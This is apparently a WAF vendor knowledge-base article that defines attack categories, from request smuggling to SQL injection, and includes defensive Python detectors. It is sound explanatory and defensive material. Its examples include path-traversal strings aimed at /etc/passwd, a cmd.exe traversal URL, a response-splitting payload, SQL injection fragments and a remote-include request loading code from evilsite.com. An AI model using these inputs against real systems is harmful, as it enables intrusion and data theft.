
Q&A: What are the definitions of attack types?


Question

  • Attack Types
  • Definition of each block event by attack type


Environment

  • Silverline WAF 
  • WAF Policy


Answer

==============================
HTTP Parser Attack:
HTTP parser attacks attempt to execute malicious code, extract information, or enact Denial of Service by targeting the HTTP parser directly.
------------------------------
*This is a general term.  Examples include, but are not limited to:
1. Cookies that are not RFC compliant
2. Malformed multipart/form-data request bodies
3. A Content-Length header with a negative or non-numeric value (Content-Length: 0 is legal on its own; a POST that declares it is covered under HTTP Request Smuggling below)
4. Maximum number of HTTP headers exceeded
==============================
HTTP Request Smuggling Attack:
HTTP Request Smuggling attacks attempt to encapsulate one request within another so that a web proxy and the server behind it disagree on where one request ends and the next begins.
------------------------------
*This is a general term.  Examples include, but are not limited to:
1. POST request with Content-Length: 0
2. Several Content-Length headers, or Content-Length sent together with Transfer-Encoding
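As an added example (not part of the original article and not F5 Silverline code), the Python snippet below applies the header checks described under HTTP Parser Attack and HTTP Request Smuggling above to a few constructed raw requests. The MAX_HEADERS limit and the sample requests are assumptions made for the illustration.

```python
"""Header sanity checks for the HTTP Parser Attack and HTTP Request
Smuggling examples above.  Added illustration for this article, not
F5 Silverline code; the MAX_HEADERS limit and the sample requests are
constructed assumptions."""

MAX_HEADERS = 50  # assumption: a plausible per-request header limit


def parse_headers(raw: bytes):
    """Split a raw request into (request_line, [(name, value), ...]).

    Duplicate headers are kept as separate entries on purpose; the
    point is to notice when Content-Length is supplied twice.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("latin-1")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name.strip().decode("latin-1").lower(),
                        value.strip().decode("latin-1")))
    return request_line, headers


def inspect_request(raw: bytes) -> list:
    """Return a list of finding labels; an empty list means nothing suspicious."""
    request_line, headers = parse_headers(raw)
    method = request_line.split(" ", 1)[0]
    findings = []

    if len(headers) > MAX_HEADERS:
        findings.append("HTTP Parser Attack: maximum number of HTTP headers exceeded")

    cl_values = [v for n, v in headers if n == "content-length"]
    te_values = [v for n, v in headers if n == "transfer-encoding"]

    # A valid Content-Length is a string of ASCII digits; '-1', '0x10',
    # '12abc' and '' are all parser bait.
    if any(not (v.isascii() and v.isdigit()) for v in cl_values):
        findings.append("HTTP Parser Attack: Content-Length is not a non-negative integer")
    if len(cl_values) > 1:
        findings.append("HTTP Request Smuggling: several Content-Length headers")
    if cl_values and te_values:
        findings.append("HTTP Request Smuggling: Content-Length and Transfer-Encoding both present")
    if method == "POST" and cl_values == ["0"] and not te_values:
        findings.append("HTTP Request Smuggling: POST request with Content-Length: 0")
    return findings


# Constructed sample requests (not captured traffic).
CLEAN = (b"GET /index.html HTTP/1.1\r\n"
         b"Host: example.com\r\n"
         b"User-Agent: Mozilla/5.0\r\n\r\n")
DUP_CL = (b"POST /upload HTTP/1.1\r\n"
          b"Host: example.com\r\n"
          b"Content-Length: 6\r\n"
          b"Content-Length: 5\r\n\r\n"
          b"abcdef")
CL_TE = (b"POST /upload HTTP/1.1\r\n"
         b"Host: example.com\r\n"
         b"Content-Length: 4\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n"
         b"0\r\n\r\n")
BAD_CL = (b"POST /upload HTTP/1.1\r\n"
          b"Host: example.com\r\n"
          b"Content-Length: -1\r\n\r\n")
TOO_MANY = (b"GET / HTTP/1.1\r\n" +
            b"".join(b"X-Pad-%d: y\r\n" % i for i in range(MAX_HEADERS + 1)) +
            b"\r\n")

if __name__ == "__main__":
    for label, req in [("clean", CLEAN), ("dup_cl", DUP_CL), ("cl_te", CL_TE),
                       ("bad_cl", BAD_CL), ("too_many", TOO_MANY)]:
        print(label, inspect_request(req) or "ok")
```

The checks deliberately operate on the raw header list rather than on a dictionary, because a dictionary would silently keep only one of the duplicate Content-Length values and hide exactly the condition being looked for.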
==============================
Detection Evasion:
Detection evasion is an attack technique that attempts to disguise or hide an attack to avoid detection by an attack signature.
------------------------------
*This is a general term.  Examples include, but are not limited to:
1. Illegal repeated parameter names
2. The URI or parameter values are encoded multiple times (for example %2527, which decodes to %27 and then to an apostrophe)
3. Bytes higher than 127, i.e. outside 7-bit ASCII
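As an added example (not part of the original article and not F5 Silverline code), the following Python snippet normalises a query string the way a signature engine has to before it can match anything, and flags the three Detection Evasion indicators listed above. The MAX_DECODE_ROUNDS limit and the sample queries are assumptions made for the illustration.

```python
"""Normalise query-string parameters the way a signature engine must
before it can match them, and flag the three Detection Evasion
indicators listed above.  Added illustration for this article, not
F5 Silverline code; MAX_DECODE_ROUNDS and the sample queries are
constructed assumptions."""
from urllib.parse import parse_qsl, unquote

MAX_DECODE_ROUNDS = 3  # assumption: legitimate clients encode exactly once


def decode_until_stable(value: str):
    """Keep percent-decoding until the value stops changing.

    Returns (decoded value, extra rounds needed).  parse_qsl already
    performed one round, so any extra round means the client encoded
    the value more than once.  The cap stops a pathological value from
    costing unbounded work.
    """
    extra = 0
    while extra < MAX_DECODE_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        extra += 1
    return value, extra


def inspect_query(query: str) -> dict:
    """Return {"params": {name: fully decoded value}, "findings": [labels]}."""
    params = {}
    findings = []
    for name, raw_value in parse_qsl(query, keep_blank_values=True):
        if name in params:
            findings.append(f"Detection Evasion: illegal repeated parameter name {name!r}")
        value, extra = decode_until_stable(raw_value)
        if extra:
            findings.append(f"Detection Evasion: {name!r} was encoded {extra + 1} times")
        # Anything outside 7-bit ASCII arrived as bytes above 127 on the wire.
        if any(ord(ch) > 127 for ch in value):
            findings.append(f"Detection Evasion: {name!r} contains bytes above 127")
        params[name] = value  # signatures should run against this, not raw_value
    return {"params": params, "findings": findings}


if __name__ == "__main__":
    # Constructed samples: a normal search, a double-encoded SQL probe
    # hidden behind a repeated parameter, and a non-ASCII value.
    for q in ("q=hello&page=2",
              "user=admin&user=guest&q=%2527%2520OR%25201%253D1",
              "name=%C3%A9cole"):
        print(q, "->", inspect_query(q))
```

Note that plain unquote, not unquote_plus, is used for the extra rounds: after the first decode a literal "+" is data, and decoding it again to a space would produce a false double-encoding finding for every value that legitimately contained %2B.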
==============================
Predictable Resource Location:
Predictable resource location is an attack technique used to uncover hidden website content and functionality.
------------------------------
*This is generally a subset of 'Forceful Browsing'.  Examples include, but are not limited to:
1. GET http://example.com/admin/, where /admin/ is a common location for administrative functions and should not be reached during standard application usage.
2. File-extension amendments: a site legitimately serves https://example.com/log, and the attacker tries GET https://example.com/log.bak hoping a backup copy was left in place.
==============================
Non-browser Client:
Non-browser Client attacks use crawlers or other scripts, rather than a browser driven by a person, to simulate human activity.
------------------------------
*The client application is typically identified from the 'User-Agent' HTTP header.  This is the most common method, but the header is set by the client and is trivial to spoof, so a browser-looking User-Agent is not proof of a browser; other fingerprinting methods (for example the set and order of headers the client sends) are used alongside it.
Example of a proper browser User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Example of a non-browser User-Agent: curl/7.21.4 (universal-apple-darwin11.0) libcurl/7.2
==============================
Forceful Browsing:
Forceful Browsing attacks attempt to access data outside the specific access schema of the application.
------------------------------
*This is a general term.  It is when a client is identified to be travelling through an application in a non-standard path.  A normal user would, for example, first go to https://example.com/login and then go to https://example.com/job-list, which indicates that the user logged in and then looked at the job list.  If you instead see a session whose very first transaction is a GET for https://example.com/job-list, with no visit to the login page, then that client typed the URL in manually (or scripted it) rather than following the button or link presented after login.
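As an added example (not part of the original article and not F5 Silverline code), the Python snippet below runs the three session-level checks described above, Predictable Resource Location, Non-browser Client and Forceful Browsing, over a handful of constructed access-log lines. The log format, the lists of predictable paths and probe suffixes, and the rule that /job-list may only follow /login are assumptions made for the illustration.

```python
"""Session-level checks for the Predictable Resource Location,
Non-browser Client and Forceful Browsing categories above, run over a
few constructed access-log lines.  Added illustration for this article,
not F5 Silverline code; the log format, the path lists and the
login-before-job-list rule are assumptions."""
import re

# Constructed log lines in an assumed 'sess=<id> <method> <path> ua="<agent>"' format.
SAMPLE_LOG = """\
sess=aaa GET /login ua="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
sess=aaa POST /login ua="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
sess=aaa GET /job-list ua="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
sess=bbb GET /job-list ua="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
sess=ccc GET /admin/ ua="curl/7.21.4 (universal-apple-darwin11.0) libcurl/7.2"
sess=ccc GET /log.bak ua="curl/7.21.4 (universal-apple-darwin11.0) libcurl/7.2"
"""

LINE_RE = re.compile(r'sess=(\S+) (\S+) (\S+) ua="([^"]*)"')

# Assumed application flow: each key may only be requested after its value.
REQUIRED_PREDECESSOR = {"/job-list": "/login"}
# Paths and suffixes that a normal user never reaches through the UI.
PREDICTABLE_PATHS = {"/admin/", "/admin", "/.git/config", "/backup/"}
PROBE_SUFFIXES = (".bak", ".old", ".orig", ".swp", "~")


def is_browser(user_agent: str) -> bool:
    """Crude first-pass check; the header is client-controlled, so treat
    a miss as a hint to look at other fingerprints, not as proof."""
    return user_agent.startswith("Mozilla/")


def analyze_log(log_text: str) -> dict:
    """Return {session_id: [finding labels]} for every session seen."""
    findings = {}
    visited = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        sess, method, path, ua = m.groups()
        out = findings.setdefault(sess, [])
        seen = visited.setdefault(sess, set())

        if not is_browser(ua):
            label = f"Non-browser Client: {ua.split(' ')[0]}"
            if label not in out:  # report once per session, not per request
                out.append(label)
        if path in PREDICTABLE_PATHS or path.endswith(PROBE_SUFFIXES):
            out.append(f"Predictable Resource Location: {method} {path}")
        needed = REQUIRED_PREDECESSOR.get(path)
        if needed and needed not in seen:
            out.append(f"Forceful Browsing: {path} requested before {needed}")
        seen.add(path)
    return findings


if __name__ == "__main__":
    for sess, labels in analyze_log(SAMPLE_LOG).items():
        print(sess, labels or "ok")
```

Session aaa follows the expected login-then-job-list path and produces nothing; session bbb jumps straight to /job-list; session ccc is a curl client probing an admin directory and a backup file, which is the combination the categories above are designed to surface.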
==============================
Information Leakage:
Information leakage is when a website reveals sensitive data, such as developer comments or error messages, which may aid an attacker in exploiting the system.
------------------------------
*This is a general term.  Examples include, but are not limited to:
1. Comments left in delivered code (HTML, JavaScript) that reveal paths to resources not intended for standard use, or even account credentials.
2. Enumeration when the system can be tricked into returning informative errors.  The following was returned when an apostrophe was placed in the username field of a login page; the server was configured to pass the raw database exception back to the client:

An Error Has Occurred.
    Error Message:
  System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression 'username = ''' and password = 'g''. at
  System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling ( Int32 hr) at
  System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult ( tagDBPARAMS dbParams,  Object& executeResult) at
==============================
Path Traversal:
The path traversal attack technique forces access to files, directories, and commands that potentially reside outside the web document root directory.
------------------------------
*OWASP: By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

*In UNIX and Windows environments, every directory contains a logical entry named ".." that refers to its parent.  For example, if you are currently in /directory0/directory1/ and you cd to .., you end up in /directory0/.  Attackers also send the sequence URL-encoded (%2e%2e%2f), double-encoded (%252e%252e%252f), or with backslashes (..\ or ..%5c) to get past a filter that only looks for the literal "../".

So, in a web app, if you are currently in https://example.com/users/Jon_Wayman/confidential and you do a GET for https://example.com/users/Jon_Wayman/confidential/../../Manny_Cadiz/confidential/, you are effectively asking for https://example.com/users/Manny_Cadiz/confidential/.
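As an added example (not part of the original article and not F5 Silverline code), the Python snippet below canonicalises a request path the way the server will before it touches the file system, so the traversal example above can be decided on the resolved path rather than on the text of the request. The /users/<name> layout and the per-user authorisation rule are assumptions taken from the example URLs.

```python
"""Canonicalise a request path the way the server will before touching
the file system, so the Path Traversal example above can be decided on
the resolved path rather than on the text of the request.  Added
illustration for this article, not F5 Silverline code; the /users/<name>
layout and the per-user authorisation rule are assumptions taken from
the example URLs."""
from posixpath import normpath
from urllib.parse import unquote

WEB_ROOT = "/users"  # assumed layout from the example above


def canonical_path(raw_path: str) -> str:
    """Resolve what the request actually points at.

    Two decode rounds catch %2e%2e and the double-encoded %252e%252e,
    backslashes (Windows separators, or %5c on the wire) are treated as
    '/', and normpath collapses every '.' and '..' segment.  For an
    absolute path normpath never climbs above '/'.
    """
    path = unquote(unquote(raw_path)).replace("\\", "/")
    return normpath("/" + path.lstrip("/"))


def check_request(session_user: str, raw_path: str):
    """Return (allowed, canonical, traversal_attempted).

    allowed: the resolved path lies inside the user's own directory.
    traversal_attempted: the request contained a '..' segment at all,
    which is worth logging even when the result stays in bounds.
    """
    canonical = canonical_path(raw_path)
    decoded_segments = unquote(unquote(raw_path)).replace("\\", "/").split("/")
    traversal_attempted = ".." in decoded_segments
    home = f"{WEB_ROOT}/{session_user}"
    # The trailing '/' matters: without it /users/Jon_Wayman_old would pass.
    allowed = canonical == home or canonical.startswith(home + "/")
    return allowed, canonical, traversal_attempted


if __name__ == "__main__":
    # Constructed requests from a session authenticated as Jon_Wayman.
    for raw in ("/users/Jon_Wayman/confidential",
                "/users/Jon_Wayman/confidential/../../Manny_Cadiz/confidential/",
                "/users/Jon_Wayman/%2e%2e/%2e%2e/etc/passwd",
                "/users/Jon_Wayman/..%5c..%5cetc/passwd",
                "/users/Jon_Wayman/%252e%252e/%252e%252e/etc/passwd",
                "/users/Jon_Wayman_old/notes"):
        print(raw, "->", check_request("Jon_Wayman", raw))
```

The decision is made on the canonical path, which is what the file system would open; matching the string "../" against the raw request would miss every encoded variant in the list.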
==============================
Denial of Service:
Denial of service (DoS) is an attack technique that overwhelms system resources to prevent a web site from serving normal user activity.
------------------------------
*This is a general term.  Examples include, but are not limited to:
1. Using hundreds of machines in a botnet to flood the target with traffic it has to process, such as ICMP echo requests or DNS reflection/amplification responses.
2. Sending a crafted request to an application that is known to make the target system spend excessive resources (CPU, memory, database time) to process it; a small number of clients can cause this.
*Abstract: Imagine being at the grocery store, where most people pay with a debit card and PIN, so the line moves quickly.  Now imagine a single customer writing out a paper cheque and waiting for it to clear; this is slower and takes up more of the cashier's time.  Now imagine someone paying 100 people to go into that store and pay with paper cheques.  That is a denial of service attack on a grocery store.
==============================
Session Hijacking:
Session hijacking attacks attempt to take over a valid, existing user session.
------------------------------
* OWASP describes it best here: https://www.owasp.org/index.php/Session_hijacking_attack
* It is when your session identifier (most often a session cookie, sometimes a token in the URL) is intercepted or stolen, and the attacker presents that same identifier to resume your session as you, without ever needing your password.
==============================
Command Execution:
Command execution attacks are when an attacker manipulates the data in a user-input field by submitting operating-system commands, with the intent of altering the web page or application, or of executing a shell command on the server to reveal sensitive data (for example, the list of users on the server).
------------------------------
*On a Windows machine the command interpreter is cmd.exe.  An example would be someone requesting https://example.com/%5c../%5c../%5c../%5c../%5c/Windows/%5c/System32/%5c/cmd.exe, where %5c is a URL-encoded backslash: the traversal sequences walk out of the web root to the system directory, and if the server decodes the path and executes what it finds there, the attacker can run commands on the target system by appending arguments to the request.
==============================
Server Side Code Injection:
Server side code injection attempts to exploit weakness in applications and services to force those services to execute malicious code.
------------------------------
*This is a general term.  Examples include, but are not limited to:
1. SQL Injection
2. Command Injection
3. X-Path Injection (XML)
==============================
Trojan/Backdoor/Spyware:
Attackers use Trojan horse, backdoor, and spyware attacks to try to circumvent a web server's or web application's built-in security by masking the attack within a legitimate communication. For example, an attacker may include an attack in an email or Microsoft Word document, and when a user opens the email or document, the attack launches.
------------------------------
*This is a general term.  For examples of each:
SEE: https://uk.norton.com/norton-blog/2016/02/the_8_most_famousco.html
SEE: https://usa.kaspersky.com/resource-center/threats/trojans
==============================
Injection Attempt:
Injection Attempt attacks exploit weakness in various other applications in order to inject and/or execute malicious code.
------------------------------
*This is a general term.  Examples include, but are not limited to:
1. SQL Injection
2. Command Injection
3. X-Path Injection (XML)
==============================
Remote File Include:
Remote file include attacks attempt to exploit web applications that retrieve and execute the code included in remote files.
------------------------------
*An attack targeting vulnerabilities in web applications that dynamically reference external scripts.  The perpetrator's goal is to exploit the referencing function in an application to load malware (e.g., backdoor shells) from a remote URL located within a different domain.
1. A JSP page contains this line of code: <jsp:include page="<%=(String)request.getParameter("ParamName")%>">.  It can be manipulated with the following request: Page1.jsp?ParamName=/WEB-INF/DB/password.  Processing the request reveals the content of the password file to the perpetrator.  (Strictly this is a local file include, since the path stays on the server; the same unsanitised parameter is what makes the remote variant possible.)
2. A web application has an import statement that requests content from a URL address, as shown here: <c:import url="<%=request.getParameter("conf")%>">.  If unsanitised, the same statement can be used for malware injection, for example: Page2.jsp?conf=https://evilsite.com/attack.js.
==============================
Vulnerability Scan:
A vulnerability scan is an attack technique that uses an automated security program to probe a web application for software vulnerabilities.
------------------------------
Examples of vulnerability scanners: OpenVAS, Nessus, Nexpose
*Typically these scans can be identified by a series of requests arriving in quick succession and in a predictable order (a walk through a list of known paths, or a series of known exploit payloads thrown at the target one after another), usually from a single source.
==============================
Buffer Overflow:
Buffer overflow exploits are attacks that alter the flow of an application by overwriting parts of memory.
------------------------------
SEE: https://www.owasp.org/index.php/Buffer_Overflows
*Basically it is when an attacker sends the application more data than the receiving buffer was sized for.  If the length is not checked, the excess is written into adjacent memory (other variables, saved return addresses) that was never intended to be touched during standard application use, which can crash the program or redirect its execution.
==============================
Cross Site Scripting (XSS):
Cross-site scripting (XSS) is an attack technique that forces a website to echo attacker-supplied executable code, which loads in a user's browser.
------------------------------
SEE: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
*This is a general term, to understand the different types...
SEE: https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting
==============================
HTTP Response Splitting:
HTTP Response Splitting attacks attempt to manipulate the server into including an attacker-supplied CR/LF sequence in its response headers, so that what the server meant as one response is read by the client (or an intermediate proxy or cache) as two.
------------------------------
CR and LF are the ASCII and Unicode control characters Carriage Return (0x0D) and Line Feed (0x0A); \r and \n are the escape sequences certain programming languages use for them, and %0d%0a is how they appear URL-encoded in a request.
SEE: https://www.owasp.org/index.php/HTTP_Response_Splitting
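As an added example (not part of the original article and not F5 Silverline code), the Python snippet below builds a redirect from a user-supplied target, shows how a CR/LF pair in that value turns one response into two, and shows the check that stops it. The redirect builder and the payload are constructed for the illustration.

```python
"""A redirect built from a user-supplied target, to show how a CR/LF
pair in the value turns one response into two, and the check that
stops it.  Added illustration for this article, not F5 Silverline code;
the redirect builder and the payload are constructed."""
from urllib.parse import unquote


def build_redirect_naive(location: str) -> bytes:
    """Copies the value straight into the Location header."""
    return (f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def build_redirect_safe(location: str) -> bytes:
    """Same, but refuses any value that could terminate a header line."""
    if "\r" in location or "\n" in location:
        raise ValueError("CR/LF in header value")
    return build_redirect_naive(location)


def count_responses(stream: bytes) -> int:
    """How many status lines a downstream proxy or cache would see."""
    return stream.count(b"HTTP/1.1 ")


def rejects(location: str) -> bool:
    """True when the safe builder refuses the value."""
    try:
        build_redirect_safe(location)
    except ValueError:
        return True
    return False


# Constructed attack value as it would arrive in a query string; the
# %0d%0a pairs decode to CR/LF and the tail is a complete second response.
SPLIT_PAYLOAD = unquote(
    "/home%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2021%0d%0a%0d%0a<html>hijacked</html>")

if __name__ == "__main__":
    print(count_responses(build_redirect_naive("/home")), "response(s) for a normal value")
    print(count_responses(build_redirect_naive(SPLIT_PAYLOAD)), "response(s) after splitting")
    print("safe builder rejects payload:", rejects(SPLIT_PAYLOAD))
```

The first response the attacker-controlled stream produces is an empty 302; the second is a complete 200 with attacker-chosen body, which is what a shared cache may store under the next URL it expects a response for.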
==============================
LDAP Injection:
LDAP injection is an attack technique used to exploit web sites that construct LDAP statements from user-supplied input.
------------------------------
LDAP, Lightweight Directory Access Protocol, is an Internet protocol that email and other programs use to look up information from a server containing an LDAP directory.
*LDAP injection is an attack used to exploit web-based applications that construct LDAP statements from user input.  When an application fails to properly sanitise that input, an attacker can modify the LDAP statement (typically by intercepting and editing the request with a local proxy).  This can result in the execution of arbitrary queries, such as granting access to data the user is not authorised for, or modification of content inside the LDAP tree.
SEE: https://www.owasp.org/index.php/LDAP_Injection_Prevention_Cheat_Sheet
==============================
SQL-Injection:
SQL Injection is an attack technique used to exploit websites that construct SQL statements from user-supplied input.
------------------------------
SEE: https://www.owasp.org/index.php/SQL_Injection
*This is a pretty extensive topic, with many examples.  Typically you either trick the interpreter into evaluating a condition that is always true (OR 1=1), terminate the statement early with a comment marker (-- or, on MySQL, #), or cause a syntax fault with an unbalanced quote (').  You can then couple this with data requests to extract passwords and other forms of sensitive data (depending on what is stored in the SQL database).
==============================
XPath Injection:
XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
------------------------------
SEE: https://www.owasp.org/index.php/XPATH_Injection
==============================
Other Application Activity/Attack:
This attack category represents attacks that do not fit into the more explicit attack classifications.
==============================
